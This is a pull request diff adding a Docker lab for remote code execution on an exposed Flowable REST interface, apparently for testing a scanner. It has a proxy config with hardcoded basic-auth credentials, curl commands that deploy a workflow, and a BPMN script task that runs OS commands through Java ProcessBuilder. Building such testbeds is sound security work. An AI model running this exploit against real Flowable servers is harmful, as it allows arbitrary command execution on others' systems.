PRP: Flowable Exposed UI RCE

flowable/exposed_ui/Caddyfile

@@ -0,0 +1,5 @@
+:8081 {
+    reverse_proxy flowable:8080 {
+        header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0"
+    }
+}

flowable/exposed_ui/README.md

@@ -0,0 +1,22 @@
+# Setup secure and vulnerable Flowable instances
+```bash
+docker compose up
+```
+test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments
+test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments
+
+# How to Exploit the Exposed UI (on Vulnerable Instance)
+```bash
+curl -X POST \
+    'http://localhost:8081/flowable-rest/service/repository/deployments' \
+    -H 'Content-Type: multipart/form-data' \
+    -F 'file=@jsScript.bpmn'
+
+curl -X POST \
+    'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
+    -H 'Content-Type: application/json' \
+    -d '{
+    "processDefinitionKey": "jsScriptProcess"
+    }'
+```
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.

flowable/exposed_ui/docker-compose.yml

@@ -0,0 +1,26 @@
+version: '3'
+
+services:
+  flowable:
+    image: flowable/flowable-rest
+    container_name: flowable-rest
+    ports:
+      - "8080:8080"
+    networks:
+      - flowable-network
+
+  caddy:
+    image: caddy:2.8.4
+    container_name: caddy-proxy
+    ports:
+      - "8081:8081"
+    volumes:
+      - ./Caddyfile:/etc/caddy/Caddyfile
+    networks:
+      - flowable-network
+    depends_on:
+      - flowable
+
+networks:
+  flowable-network:
+    driver: bridge

flowable/exposed_ui/jsScript.bpmn

@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
+             xmlns:flowable="http://flowable.org/bpmn"
+             targetNamespace="Examples">
+
+  <process id="jsScriptProcess" name="JavaScript Script Process">
+    <startEvent id="start" />
+    <sequenceFlow sourceRef="start" targetRef="scriptTask" />
+    <scriptTask id="scriptTask" name="Execute Command via JavaScript" 
+                scriptFormat="javascript" 
+                flowable:autoStoreVariables="true">
+      <script>
+        var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
+        var Arrays = Java.type('java.util.Arrays');
+        var Scanner = Java.type('java.util.Scanner');
+
+        var processBuilder = new ProcessBuilder(Arrays.asList('uname', '-a'));
+        var process = processBuilder.start();
+
+        var scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");
+        var result = scanner.hasNext() ? scanner.next() : "";
+
+        execution.setVariable('commandOutput', result);
+      </script>
+    </scriptTask>
+    <sequenceFlow sourceRef="scriptTask" targetRef="end" />
+    <endEvent id="end" />
+  </process>
+
+</definitions>